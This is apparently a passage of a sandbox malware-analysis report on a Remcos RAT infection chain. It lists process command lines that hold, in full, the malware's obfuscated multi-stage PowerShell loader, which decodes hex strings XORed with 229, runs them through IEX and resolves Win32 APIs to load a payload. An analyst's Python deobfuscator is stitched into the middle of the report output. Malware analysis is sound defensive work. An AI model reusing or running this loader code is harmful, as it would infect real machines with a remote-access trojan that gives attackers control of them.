Bu'PrCEm1de9ud3Da8Pr4Te9du7AdBfeAjo9Al7An9Sk0St8BeBBa8Re8Vr8Li0CoCDoBErAUnCIn8ExBFl9Bo3St8SpARe8RoENu8Be0AsCBoDstCFe1Pr8AaAHo9wh7Fo8BeCLeCTr9InCBo1Va9Ud3Rh8Si4Ah9Si7DaBExAGr8ThBDa9yo1ToCTwCSp'We;Sk&go(Lu`$StSHetDeyprrMekBleKotomrSonWyeAl7Ti)Cr Pr`$ReLPrsSueGurAbuMenNedPaeDarSysTogSteaslIdsAdeFirBy3Te#Pj;""";;Function Lserundersgelser9 { param([String]$HS); For($i=2; $i -lt $HS.Length-1; $i+=(2+1)){ $Antidrug = $Antidrug + $HS.Substring($i, 1); } $Antidrug;}$Romerretlige0 = Lserundersgelser9 'AlIMeEPaXSa ';$Romerretlige2 = Lserundersgelser9 'opsFrtSraUrrHytPa-TjjUnoskbDi ';$Romerretlige1= Lserundersgelser9 $Badeanstalt;;if([IntPtr]::size -eq 8){.$env:windir\S*64\W*Power*\v1.0\*ll.exe $Romerretlige1 ;}else{&$Romerretlige0 $Romerretlige1;};;;
                        Imagebase:0x7ff6766f0000
                        File size:452608 bytes
                        MD5 hash:04029E121A0CFA5991749937DD22A1D9
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:.Net C# or VB.NET
                        Reputation:moderate

                        Target ID:4
                        Start time:20:44:31
                        Start date:28/11/2022
                        Path:C:\Windows\System32\conhost.exe
                        Wow64 process (32bit):false
                        Commandline:C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                        Imagebase:0x7ff773f10000
                        File size:875008 bytes
                        MD5 hash:81CA40085FC75BABD2C91D18AA9FFA68
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:high

                        Target ID:5
                        Start time:20:44:33
                        Start date:28/11/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):
                        Commandline:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe" "Function HTB { param([String]$HS); $Bytes = New-Object byte[] ($HS.Length / 2); For($i=0; $i -lt $HS.Length; $i+=2){ $Bytes[$i/2] = [convert]::ToByte($HS.Substring($i, 2), 16); $Bytes[$i/2] = ($Bytes[$i/2] -bxor 229); } [String][System.Text.Encoding]::ASCII.GetString($bytes);}$Hdlc0=HTB 'B69C96918088CB818989';$Hdlc1=HTB 'A88C86978A968A8391CBB28C8BD6D7CBB08B96848380AB84918C9380A880918D8A8196';$Hdlc2=HTB 'A28091B5978A86A4818197809696';$Hdlc3=HTB 'B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083';$Hdlc4=HTB '9691978C8B82';$Hdlc5=HTB 'A28091A88A81908980AD848B818980';$Hdlc6=HTB 'B7B1B69580868C8489AB848880C9C5AD8C8180A79CB68C82C9C5B59087898C86';$Hdlc7=HTB 'B7908B918C8880C9C5A8848B84828081';$Hdlc8=HTB 'B78083898086918081A180898082849180';$Hdlc9=HTB 'AC8BA880888A979CA88A81908980';$Styrketrne0=HTB 'A89CA180898082849180B19C9580';$Styrketrne1=HTB 'A689849696C9C5B59087898C86C9C5B68084898081C9C5A48B968CA689849696C9C5A490918AA689849696';$Styrketrne2=HTB 'AC8B938A8E80';$Styrketrne3=HTB 'B59087898C86C9C5AD8C8180A79CB68C82C9C5AB8092B6898A91C9C5B38C9791908489';$Styrketrne4=HTB 'B38C9791908489A489898A86';$Styrketrne5=HTB '8B91818989';$Styrketrne6=HTB 'AB91B5978A91808691B38C9791908489A880888A979C';$Styrketrne7=HTB 'ACA0BD';$Styrketrne8=HTB 'B9';function fkp {Param ($v_m, $v_p) ;$Leucifer0 =HTB 'C193908B88C5D8C5CDBEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA28091A49696808887898C8096CDCCC599C5B28D809780C8AA878F808691C59EC5C1BACBA2898A878489A49696808887899CA684868D80C5C8A48B81C5C1BACBA98A8684918C8A8BCBB695898C91CDC1B6919C978E8091978B80DDCCBEC8D4B8CBA09490848996CDC1AD818986D5CCC598CCCBA28091B19C9580CDC1AD818986D4CC';&($Styrketrne7) $Leucifer0;$Leucifer5 = HTB 'C1938497BA829584C5D8C5C193908B88CBA28091A880918D8A81CDC1AD818986D7C9C5BEB19C9580BEB8B8C5A5CDC1AD818986D6C9C5C1AD818986D1CCCC';&($Styrketrne7) $Leucifer5;$Leucifer1 = HTB 
'97809190978BC5C1938497BA829584CBAC8B938A8E80CDC18B908989C9C5A5CDBEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083B8CDAB8092C8AA878F808691C5B69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBAD848B818980B78083CDCDAB8092C8AA878F808691C5AC8B91B59197CCC9C5CDC193908B88CBA28091A880918D8A81CDC1AD818986D0CCCCCBAC8B938A8E80CDC18B908989C9C5A5CDC193BA88CCCCCCCCC9C5C193BA95CCCC';&($Styrketrne7) $Leucifer1;}function GDT {Param ([Parameter(Position = 0, Mandatory = $True)] [Type[]] $var_parameters,[Parameter(Position = 1)] [Type] $vrt = [Void]);$Leucifer2 = HTB 'C1B3B1A7C5D8C5BEA49595A18A88848C8BB8DFDFA6909797808B91A18A88848C8BCBA180838C8B80A19C8B84888C86A49696808887899CCDCDAB8092C8AA878F808691C5B69C96918088CBB78083898086918C8A8BCBA49696808887899CAB848880CDC1AD818986DDCCCCC9C5BEB69C96918088CBB78083898086918C8A8BCBA0888C91CBA49696808887899CA7908C89818097A48686809696B8DFDFB7908BCCCBA180838C8B80A19C8B84888C86A88A81908980CDC1AD818986DCC9C5C18384899680CCCBA180838C8B80B19C9580CDC1B6919C978E8091978B80D5C9C5C1B6919C978E8091978B80D4C9C5BEB69C96918088CBA89089918C86849691A180898082849180B8CC';&($Styrketrne7) $Leucifer2;$Leucifer3 = HTB 'C1B3B1A7CBA180838C8B80A68A8B9691979086918A97CDC1AD818986D3C9C5BEB69C96918088CBB78083898086918C8A8BCBA68489898C8B82A68A8B93808B918C8A8B96B8DFDFB691848B81849781C9C5C1938497BA95849784888091809796CCCBB68091AC8895898088808B9184918C8A8BA389848296CDC1AD818986D2CC';&($Styrketrne7) $Leucifer3;$Leucifer4 = HTB 'C1B3B1A7CBA180838C8B80A880918D8A81CDC1B6919C978E8091978B80D7C9C5C1B6919C978E8091978B80D6C9C5C1939791C9C5C1938497BA95849784888091809796CCCBB68091AC8895898088808B9184918C8A8BA389848296CDC1AD818986D2CC';&($Styrketrne7) $Leucifer4;$Leucifer5 = HTB '97809190978BC5C1B3B1A7CBA69780849180B19C9580CDCC';&($Styrketrne7) $Leucifer5 ;}$kk = HTB '8E80978B8089D6D7';$Leucifer6 = HTB 
'C1938497BA9384C5D8C5BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA28091A180898082849180A38A97A3908B86918C8A8BB58A8C8B918097CDCD838E95C5C18E8EC5C1B6919C978E8091978B80D1CCC9C5CDA2A1B1C5A5CDBEAC8B91B59197B8C9C5BEB0AC8B91D6D7B8C9C5BEB0AC8B91D6D7B8C9C5BEB0AC8B91D6D7B8CCC5CDBEAC8B91B59197B8CCCCCC';&($Styrketrne7) $Leucifer6;$var_nt = fkp $Styrketrne5 $Styrketrne6;$Leucifer7 = HTB 'C1AA918D8C8BD6C5D8C5C1938497BA9384CBAC8B938A8E80CDBEAC8B91B59197B8DFDFBF80978AC9C5D6D0D6C9C5D59DD6D5D5D5C9C5D59DD1D5CC';&($Styrketrne7) $Leucifer7;$Leucifer8 = HTB 'C18A978CC5D8C5C1938497BA9384CBAC8B938A8E80CDBEAC8B91B59197B8DFDFBF80978AC9C5D59DD4D5D5D5D5D5C9C5D59DD6D5D5D5C9C5D59DD1CC';&($Styrketrne7) $Leucifer8;$Lserundersgelser=(Get-ItemProperty -Path 'HKCU:\Metagnomy\eagled').Sarcologist;$Leucifer9 = HTB 'C1A98090868C838097C5D8C5BEB69C96918088CBA68A8B93809791B8DFDFA3978A88A7849680D3D1B691978C8B82CDC1A9968097908B81809796828089968097CC';&($Styrketrne7) $Leucifer9;$Lserundersgelser0 = HTB 'BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA68A959CCDC1A98090868C838097C9C5D5C9C5C5C1AA918D8C8BD6C9C5D6D0D6CC';&($Styrketrne7) $Lserundersgelser0;$size=$Leucifer.count-353;$Lserundersgelser1 = HTB 'BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA68A959CCDC1A98090868C838097C9C5D6D0D6C9C5C18A978CC9C5C1968C9F80CC';&($Styrketrne7) $Lserundersgelser1;$Lserundersgelser2 = HTB 'C1938497BA97908B8880C5D8C5BEB69C96918088CBB7908B918C8880CBAC8B9180978A95B68097938C868096CBA88497968D8489B8DFDFA28091A180898082849180A38A97A3908B86918C8A8BB58A8C8B918097CDC1AA918D8C8BD6C9C5CDA2A1B1C5A5CDBEAC8B91B59197B8C9BEAC8B91B59197B8CCC5CDBEB38A8C81B8CCCCCC';&($Styrketrne7) $Lserundersgelser2;$Lserundersgelser3 = HTB 'C1938497BA97908B8880CBAC8B938A8E80CDC18A978CC9C1938497BA8B91CC';&($Styrketrne7) $Lserundersgelser3#
                        Imagebase:
                        File size:433152 bytes
                        MD5 hash:C32CA4ACFCC635EC1EA6ED8A34DF5FAC
                        Has elevated privileges:
                        Has administrator privileges:
                        Programmed in:C, C++ or other language
                        Reputation:moderate
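The two PowerShell command lines above carry the whole decoding logic in the clear: the first stage (`Lserundersgelser9`, and `spildevandsprojekter9` in the Bichloride.vbs re-run) keeps every third character of a junk-padded string starting at index 2, and the second stage (`HTB`) hex-decodes each literal and XORs every byte with 229 before `IEX` evaluates it. The script below is an added analyst aid, not code from the report or from the sample, that re-implements both layers so the captured strings can be decoded offline. Function names (`strip_every_third`, `hex_xor`, `decode_htb_calls`, `deobfuscate`, `junk_pad`) are my own; the regex assumes HTB is only ever called as `HTB '<hex>'`, which is the only form present in the captured second-stage script. Two caveats when feeding it material from this page: the first-stage payload sits in a double-quoted here-string, so every `$` is written as `` `$ `` and PowerShell removes that backtick before the function runs (strip it first or the triple alignment shifts), and where the rendered report has collapsed runs of spaces the alignment is lost too, so decode from the raw command line rather than the page text.

```python
"""Deobfuscator for the two PowerShell encoding layers captured in this report.

Layer 1: the Lserundersgelser9 / spildevandsprojekter9 functions keep every
         third character of a junk-padded string (indices 2, 5, 8, ...).
Layer 2: the HTB function hex-decodes a string and XORs every byte with 229.
"""
import re

XOR_KEY = 229  # 0xE5, the constant in `-bxor 229` of the captured HTB function


def strip_every_third(padded: str) -> str:
    """Layer 1. Mirrors `For($i=2; $i -lt $HS.Length-1; $i+=(2+1))`: keep the
    character at index 2, 5, 8, ... and stop before the last index, so the
    trailing pad character the obfuscator appends is never emitted."""
    return "".join(padded[i] for i in range(2, len(padded) - 1, 3))


def hex_xor(hexstr: str, key: int = XOR_KEY) -> str:
    """Layer 2. Mirrors HTB: ToByte(pair, 16), -bxor 229, ASCII.GetString."""
    if len(hexstr) % 2 != 0:
        raise ValueError("HTB input must be an even number of hex digits")
    return bytes(b ^ key for b in bytes.fromhex(hexstr)).decode("ascii")


# Assumption: in the captured second-stage script HTB is only ever invoked as
# HTB '<hex>' (sometimes with a line break before the literal), so a regex
# over the recovered script text is enough to harvest every encoded string.
HTB_CALL = re.compile(r"HTB\s+'([0-9A-Fa-f]+)'")


def decode_htb_calls(script: str) -> list[str]:
    """Return the plaintext of every HTB '<hex>' literal in a layer-2 script."""
    return [hex_xor(h) for h in HTB_CALL.findall(script)]


def deobfuscate(layer1_payload: str) -> list[str]:
    """Undo layer 1, then decode every HTB literal in the recovered script."""
    return decode_htb_calls(strip_every_third(layer1_payload))


def junk_pad(plain: str, junk: str = "Xy") -> str:
    """Test aid only (not the malware's encoder): wrap each character in two
    junk characters and append one pad character, which is the shape the
    captured first-stage strings have."""
    return "".join(junk + c for c in plain) + junk[0]


if __name__ == "__main__":
    # Literals copied verbatim from the command lines in this report.
    print(strip_every_third("AlIMeEPaXSa "))                    # IEX
    print(strip_every_third("opsFrtSraUrrHytPa-TjjUnoskbDi "))  # start-job
    for h in ("B69C96918088CB818989", "A28091B5978A86A4818197809696",
              "8E80978B8089D6D7", "ACA0BD"):
        print(hex_xor(h))          # System.dll, GetProcAddress, kernel32, IEX
    # Constructed layer-1 payload wrapping a fragment of the layer-2 script,
    # to exercise the full pipeline end to end.
    sample = junk_pad("$Styrketrne7=HTB 'ACA0BD';$kk = HTB '8E80978B8089D6D7';")
    print(deobfuscate(sample))                                  # ['IEX', 'kernel32']
```

Decoding the harvested literals is what turns the opaque `$Hdlc*` / `$Styrketrne*` assignments into the loader's real vocabulary (`System.dll`, `GetProcAddress`, `kernel32`, `IEX`), which is the quickest way to confirm from the command line alone that the second stage resolves Win32 APIs dynamically rather than guessing from the Yara hit on ieinstal.exe.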

                        Target ID:8
                        Start time:20:44:56
                        Start date:28/11/2022
                        Path:C:\Program Files (x86)\Internet Explorer\ieinstal.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Program Files (x86)\internet explorer\ieinstal.exe
                        Imagebase:0x330000
                        File size:480256 bytes
                        MD5 hash:7871873BABCEA94FBA13900B561C7C55
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Yara matches:
                        • Rule: JoeSecurity_Remcos, Description: Yara detected Remcos RAT, Source: 00000008.00000002.7449931137.000000001F1C0000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
                        Reputation:moderate

                        Target ID:9
                        Start time:20:45:14
                        Start date:28/11/2022
                        Path:C:\Windows\SysWOW64\wscript.exe
                        Wow64 process (32bit):true
                        Commandline:"C:\Windows\System32\WScript.exe" "C:\Users\user\AppData\Local\Temp\Bichloride.vbs"
                        Imagebase:0xaa0000
                        File size:147456 bytes
                        MD5 hash:4D780D8F77047EE1C65F747D9F63A1FE
                        Has elevated privileges:true
                        Has administrator privileges:true
                        Programmed in:C, C++ or other language
                        Reputation:moderate

                        Target ID:10
                        Start time:20:45:43
                        Start date:28/11/2022
                        Path:C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                        Wow64 process (32bit):true
                        Commandline:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" "$Damspils = """ReFGruKonNacSktDoiKloUtnHe GrHshTPuBMi Mi{G ud ho Pr HvpflaRurNoaVamSo(st[DeSBotOrrMoiAnnBogPh]Di`$HiHStSBl)Ro;Pa Ni vn Ra Sa`$InBvoyUntAlesisBe Sp=Af UnNBreGrwKr-ByOCabOmjcyeUncBytOr PrbGlyFotPreSt[Be]Av Fa(fo`$AlHDeSSt.MiLQueRinPegBatHahGe Te/Un Ev2Me)Ta;Sm Op Fo St ChFmooKurUn(Sc`$HaiDr=Di0Pr;Is Ly`$HaiPo Sn-OvlKitCo Dy`$FlHSpSpe.GyLSkeOknbrgCatSahAl;Ko Sp`$DeiTr+Da=sk2Ak)La{Ma Sp Wh Ko Gu Va St Ba Pt`$PrBUdySttAueBesUr[Hy`$OdiSt/Kf2Ar]Re Ka=De Ku[AbcFooTonPavToeUdrCotFu]je:Bo:SpTstoSkBGlyGrtPreUr(Su`$UiHDeSNo.caSpruCobOvsPotwerHyiLinTrgCu(St`$MaiMa,Le Di2My)In,Pa Pa1Az6No)Ju;Co Ba Rn`$GaBOpyTitSteBosDi[Au`$EliAd/As2Ma]Pa Ve=Tr Sh(Ci`$SpBAayTetOxeBosIn[Ra`$MaiOm/Ba2Am]Bo Do-TibDixGloMorPa En2Fr0ba1Om)He;Au Vg Re Mr as}Mi Mi[SuSKktTurspiFanMagOv]En[GrSInyHysCltCaeStmIn.StTPoeUdxUntKo.reEAfnThcUnoTrdariUnnRegTa]Be:Ka:OvASlSTrCPaIExIBr.DiGSaehatMiSOutAlrSpiTanSugBi(me`$ElbInyEttIneMasSu)Ci;By}Mi`$InRHaeGrcOvaGilSycTeiOptRhrRiaHitdieMe0Pi=LiHomTExBOv Sn'Ho9ThASnBVi0VaBAaARaBCiDplACoCGyAVo4OpEIn7WeAKoDPeAEx5OpAFr5Cu'bi;Ge`$EmRAfeBycDiaEmlUncheiAptrirExaHetsteBe1lb=GuHDaTGeBSk Le'Di8Rg4LyApr0InAViASpBReBBoACo6SiBSlAKoAFi6ScABrFMiBLiDSiEMo7Be9laEUnASt0BiAKo7WrFCaAUnFStBHoECh7Ra9ChCPaABe7SkBadAPaATr8HuAKeFskADoCkn8Sk7MaAPr8RoBCrDFoAPe0MeBLaFScAJuCNo8Te4BoAReCSpBDiDdeAun1BiATi6TuAWeDHeBIlARi'Im;Ga`$HoRIseMicCaaChlPocFoiTrtberDeaFltFoeXx2ma=RuHMeTOvBNo Pi'Ru8LyERaAObCMyBAnDUn9In9AnBIdBbaAHy6WiAspAUn8Pa8JoABiDFlASvDFaBDaBCiAbiCHaBjaAPrBanAFo'Ju;Sa`$MtRThehicHyaUnlCycSeiDetNorSnaEbtTeeDy3Ge=urHMaTPhBBu Ex'Si9AdABeBNa0OlBMiASkBBoDBrAMuCUnARu4HoECh7Be9SyBFoBusCOpAUn7FaBUnDSpAOp0haAAn4KiAReCSrESm7Ga8Ro0DoAGl7TiBfoDGlASiCYoBSuBDeAJo6FlBAi9Af9MaAKiASpCSaBFjBGaBFrFBnAsw0OvAWeACuAteCToBLaAOuEFo7Sa8Se1InATi8SpAEc7DeAFoDSaAOp5FoAAlCGi9CyBFiAReCKlADrFFe'Ko;Be`$ToRMaePrcNoaInlRecEtiMatInrWiaKotAleEx4Ga=FoHTiTBaBWe 
Un'OvBTrAHeBinDIlBPyBFaAEv0KoABe7AmAStEUn'Fo;Co`$SkRSeeVacobabrlincRyiDetGrrWhaChtFoeRa5Ba=ccHSpTAnBPr Au'In8VgEFnAPaCYpBMoDOm8Kl4RaAMu6DeACoDHuBHiCSnAHy5LoAGeCUd8Th1TrAFl8InAEn7TaAUnDBuAel5AfAKaCRe'Un;Af`$GaRDeeBocmyaMelMacKviOptMirHeaTrtPaeSa6Pl=HeHOmTKiBUl Ea'Ku9svBUb9LiDGe9NeASuBFe9foANaClaAInAHeAFy0FoAKh8CaATr5un8To7FlAEn8KoAHe4DoABiCdiEBl5HiEOi9Ha8Po1MaAfl0alATaDDiACiCAf8GiBSpBCa0ra9BuADuAAe0UdACaESjETr5GoEHa9Op9Ma9StBexCWoAStBKrARn5BeAFl0AmAarAAf'Uk;Jo`$TeRBaeRecNaaHolDrcJeiOmtImrOuaNotSoeKo7Re=SuHXyTRuBTa Tr'na9LiBFoBScCHuADe7AaBGrDJuACa0foAGi4AnAReCGlEYo5MaEKa9Or8Mi4deAIn8MoASj7EuAth8FuAFoEimAMeCUnABeDGi'Ty;do`$TeRFleVacInaMelUocPuiOvtWirLeaKntMneAn8St=TiHPaTPaBSt St'Tn9LiBChANoCLyAJoFLyAAs5DiAFaCViADmABoBCaDOpALvCGaAHiDPr8HaDVaAPoCOvAPo5TaANoCcrAPrEScACi8MeBApDnoAKaCLy'St;Un`$SmRFieSicSeaSelDicPaivatRarTeaPotReeDr9Ov=MeHDoTSiBSt ca'Ta8os0GlANo7Ro8Ch4PeATrCreAOp4BeASt6aaBAaBIlBAl0En8st4HoAFe6YeARaDlsBExCUnAUn5PrAPoCde'Fo;Ro`$StDnoeGomFgaSugcynKieretEviAmzPaaLmbBllUdePl0Co=PaHAlTAgBKi ma'Ba8Dr4noBSy0Sa8ToDHuAFrCTeATi5GeAfoCUnAsoEChASe8KaBfaDStAHuCBr9NaDVeBSu0AdBMn9FoASaCRi'Ex;Pa`$SkDTreIfmStaPogNanApeIdtNoiAnzRaaFlbAblOveNo1Gl=OmHKiTOuBRe Un'Di8VeASkAGn5OpAGi8DaBPaAHaBFeAPiEle5TrEPa9Sp9No9ovBUnCSiACaBAbAPl5ViAAr0BiAKaAInEEr5boEKo9Sm9BrAGaAApCVaANy8NeAFo5KoASeCStAAnDsnEKo5CiEFl9Re8Sa8KoAAg7ReBEbARoASk0Ko8InANeAIn5stAGu8BlBGuATrBArAKvEAr5SaEFl9Ca8Ov8NoBApCStBInDUnABa6Es8MeALaAme5MaAKb8FlBMiAAlBunAGa'st;Vo`$FnDCoeNemDuaHjgDinBreSutsuiUnzreaunbValtreGs2Fe=StHglTarBFa Af'Ko8Gg0PaALv7BeBMeFSuANo6OrAPh2arABeCbe'Be;Tr`$BaDFaeArmOvaFogBanIneUdtspiEfzFaaUnbdelPreRe3Li=RhHSpTcaBex Am'Ti9La9BaBCaCPaACoBWrALe5NoALi0SyAAnASkEvo5SuESp9Mi8bo1WaATi0DeASyDChAMeCMi8OrBHeBGu0gr9trATeAho0JuAMiEkoEFe5FaEAd9Ve8me7ReASuCSyBUvESp9PaASaAVr5UnAFa6PrBSuDHoEPe5HeEDi9Re9EnFTiAMa0UnBstBAnBHvDBaBDyCReAps8SnAJa5fr'Pa;Af`$FaDRoeBomUgaNogFrnmaeEdtJeiPrzBeacobNolSleSy4En=SkHFiTKrBSp 
Co'Qu9deFBeASa0laBMoBSlBInDEmBGoCDoAUn8SoAEs5Ba8Ch8KoAbr5HrASt5FeAEf6VeAOpASu'Ma;Ma`$TiDTeeVimsnaTigGrnoreTrtPoiUtzSqafobHelSseFr5Le=SkHMoThaBPh Na'TrASy7SaBEkDEcAEnDdoAIn5EnAFi5Nn'La;Pi`$geDNoeNomAraTrgUnnDeeMetuniTrzCoapobHalKaeKl6In=BrHBeTCaBBl Po'Gu8Er7tvBScDTr9An9MiBShBEcAMl6ToBAuDDeAOpCOvAAfAUnBSlDEx9KuFKaAAn0SaBDiBUnBTeDBuBenCTrAId8AlASp5Sm8De4geAApCViAOu4DoAca6EpBHiBBiBSv0Ur'Sp;Sc`$OmDFaeodmAfaMigMinSaeUdtCoiSezPaaNabMelkleTe7Ol=coHUnTBeBUl Mu'Eg8Co0My8KeCAl9Gr1Me'St;De`$VeDLaeAcmHaaSpgRenooeBetStisazRsaPrbEnlmaeKo8Un=PrHKuTSoBOx Vi'Ly9Ra5Gy'Ge;OsfKauOlnNocFltKoiFroSknFa ArfhikShptr Fo{PoPRuaFarReaMemDi Mo(Ae`$TrvBi_ZamTe,In Rh`$ChvSo_topFa)Op Sa Mi An Su De;To`$SoARodMosKocBrrRoiKnpPatheiEntSviUduGesFo0St Wr=DeHCeTCyBOr Go'KuEKoDInBSiFFoBHuCPeASa7ExARi4NaEHo9GlFti4SkEsi9KrEMa1In9Ni2Re8Ca8EnBTo9OrBDe9Mu8OvDSiAWo6opAFi4SuATr8OrAGr0CaAIn7Ka9To4BrFti3EnFWe3in8CoAraBUnCWiBHyBTaBReBBaAMaCDhAUp7LnBBdDTl8TeDFrAda6JaARa4AdADe8PhAFo0PeAUn7EnEBr7Ud8CoEBeAVaCPuBCoDFa8Ra8SnBKnARoBUrAFaAOvCAcAKi4BuASnBtoAAn5PrASc0VaADeCSaBFoASpERe1PeEVa0brERi9EnBef5NaEhi9ma9TaEReATa1AeAFoCAcBNoBSeANoCGlELa4Gi8Ea6KdAAmBSvAKl3NiAheCOuAHoACaBSpDMoECh9EpBZo2FlEDa9veECiDSn9Mi6ReESl7Ta8KaEAnAPi5KyAFu6TmAPrBAaABo8StABr5Pe8fo8MoBFoAShBpsAafAPuCTeAKu4BfAPrBErAFe5FrBDe0Be8OvABaAUn8TaASuAEvATa1zaADaCtbEDe9EuEaa4Pl8An8CaAOv7wyADoDMiEVi9StEVeDFy9Ma6StEEv7Ag8Lb5MaAHu6UnAFoAMaABe8ThBHoDCrAla0VaASt6biARa7OpEHv7Ul9MoAMaBCo9udAVa5BoAOf0VaBPrDOmEHo1ReEHyDMo8MaDCoAHeCbgAUn4SpARe8SnACoEUfARi7BuACoCInBBeDUnATi0TaBBr3FoAPu8EnAKlBBoAMi5LaAGaCChFFl1UnEem0Am9Pl2BiEEp4UnFCi8Ta9Ma4ThEJa7An8JuCTeBcl8PiBkhCheAVi8GgAbo5PiBUdAFuESj1InEstDAu9LaBBeAPoCCuAShAfaASi8ReAHe5AfABlADeAGe0OvBOrDKlBVeBLaAAu8LsBSeDMeADiCklFSa9VgEDe0cyEBa9HjBsm4CuEPr0BlEHv7Bl8MaEFlASkCBrBSyDAc9RoDCeBFl0KoBGa9SkAChCDiEin1BrEFaDGr9MiBOtAbuCkaASiANaAFl8beANe5SuABeAKaAVe0ArBZoDkaBJaBSiALe8WeBAlDFoAovCStFSa8NoELo0Sk'Di;no&Pi(Du`$FoDSheFumboawagkunAfeSltBoiVrzTraNabUnlReeSe7Ek)Pu 
Qu`$PrApedLasAfcTerReiUnpCitboiFetLaiMiuTrsNo0Fa;Um`$IfAPsdAdsHycForChiGopExtPriudtKoiCiuFrsNe5Bo Lu=In SuHReTReBWi Te'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'Nd;Ha&Do(Po`$AcDLyeKimLdaSpgminSyeCetioiImzSaaWobFolSmeAs7Fo)Tw Pr`$faALidRasKacHurSpiPopTatAviKotRaiJoutisEw5Bi;Sp`$NeAUddEasHycEnrSuiSypIntDiiBltInismuPrsAk1Jv Da=Bu EnHKuTPoBDo Me'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'Bi;Hr&Ov(Dr`$UnDPremimWaaSygTrnkueDatBaiBezToaPrbSplExeye7Mi)Pe Di`$BlAOldEmsKrcBlrRaiFlpSktKoiSktAniSauHisSo1Ba;Da}AtfDeuSenGecIntBuigaoJanOu teGDeDMiTBe Ph{ToPSuaLerDiaComSe di(Li[dePSkaBerBeaDimKieExtNieStrEn(TiPTioBusKeiVotVaiHyoGanBr Ne=Hu Pi0Sp,Sp FoMTraKunBadSpaNotStoVirNeySv Fo=Ed Sv`$unTChrMeuReePa)Ud]Ro Mu[ThTHuyRepTeede[Ha]No]Ba St`$DovPlaTirGg_HapFeaPorshaGomRieNutPreHarJusSu,Ge[UnPCoaFerMaaMamHreVatBieNorOr(SkPVaogrsWaiWotBaisloFrnVa pr=Mi Fl1Yd)Ke]Ko Cl[ReTelyHapUdeRe]Hy Pl`$BlvSkrIktWh An=Be Su[BaVTaoRaiCadTh]ar)Gk;Au`$SoASadElsGycFirVaiSopSptJeiPhtAeiMeuSasVu2Ru Th=Ca LiHSlTTrBKl 
Su'SaEOmDCh9ZoFSu9PeDEk8PiBAfEFl9BaFAp4MeEel9Sp9Ra2Sk8Re8CoBMa9daBPr9co8PyDBaATh6FrAGe4EcAEt8PiAFa0exASk7Gs9fo4BuFRe3PrFHr3Te8AnAAdBBaCNyBheBOpBDiBCaAUnCAlASt7HeBInDTh8KeDSnAId6RfADe4RuASe8OxATr0JuAFr7KaECo7Mi8KoDTvABaCQuAInFDeATi0SkAPe7GaADeCVa8StDJaBCo0ApAKi7FjATa8AlATe4CaAMi0ReAOiAAr8Ln8AnBSaAtrBSaAsoAFrCGeAHa4NeALaBTrAPl5DiBat0MaENi1ImEMa1Un8Li7trAesCFoBRoEReELa4Ve8Ac6UnAHoBEqAAa3coAaaCExAToAStBImDInEJe9in9FaAEvBSk0afBHyACuBTrDPrAinCTeABe4CeEAm7Ta9raBPeAWhCscAnaFBrASp5beAAcCBiAUnARkBInDFoAMu0KlAFh6HyAAm7BiELa7Pr8ba8FaBFoABrBStABeACiCLaALi4SeAEnBAtACr5laBSl0He8Sp7ChAMo8UnAAj4FiABiComEOv1KoEsuDFi9ViBLyADeCHyACoABnAAf8KaAFr5DoADoAEtAEr0PrBAsDStBWhBFiAHj8PrBReDCeAWiCKaFMo1frEUn0PiEOi0duEBr5PjEMo9La9An2Fa9KoAGeBIn0CrBSmALiBAxDLoAUlCBuAFa4MbEPa7Fa9KaBTrALiCEfAPaFInAsl5FrAjoCKoAPaAMaBUnDKoAEt0InANa6SeASe7NoEDi7Sh8UpCalAUb4DiAEt0foBChDKoEFo7Da8Re8HaBHoAMaBNaABeASpCspABo4InAOfBhjARh5AnBLo0Ba8FoBfiBStCCaAal0SiAPr5CoAHaDshAAcCSkBFlBSt8Pu8UrAsiAPrAYoAHuATlCKrBInAKaBStASy9Al4TiFOn3kiFMa3Fo9viBPaBMoCHoAbr7WoECe0FyEGn7ca8KoDKoAGeCAfAMaFStAco0BeACo7SkAfoCAn8StDAkBGe0meASt7DaAIn8WoAJo4VeAKo0EnANoACh8Ve4ScACr6KaAStDDrBArCFeAKu5SeAFrCFlEPa1MeECuDbi9HeBcyAReCCoAOsADiACo8LaABa5beAShABeASc0AmBBrDteBExBfaAes8frBUnDUdACrCFlFBr0TrEbe5afELy9PhEgiDDiABuFScAkm8BeAko5MaBLyAOvAGaCStESv0DaEAa7no8liDStAMaCYiAReFunAAn0UnAKv7EkAEnCOr9OcDInBUn0DaBIn9HvAmuCVeEUn1afEAmDMe8SpDStASoCMaAFr4CrAFa8ViAScENoABo7VaABrCPrBBaDFoAOb0unBAn3ReAPi8CaAreBUfAFi5BlATaCInFSn9PeEAn5fuEPu9DrECoDBu8teDIlACaCIlANa4ReASk8PrAFrERhARe7BrAHjCNeBUmDBiASa0HyBKo3WeAHe8UnAFiBAfABu5PnASaCPrFGe8StEFi5LuESu9An9Ti2Vi9BeAToBPu0FlBDeABrBFoDJaASkCQuAsk4SuEFr7Pa8Ry4SuBMiCVaAAc5BiBMaDSuAHo0SkATiAMaAAr8EmBHeAPiBLiDfo8AnDTuABrCAtAPl5FrAPrCExAWaELiATr8BlBSnDSiAImCMi9Un4EtEHa0Bl'Tr;Po&Co(Ov`$PrDBleRdmGlaSmgDenPteChtaniFrzstaKebCalHaeEn7Wa)Bd 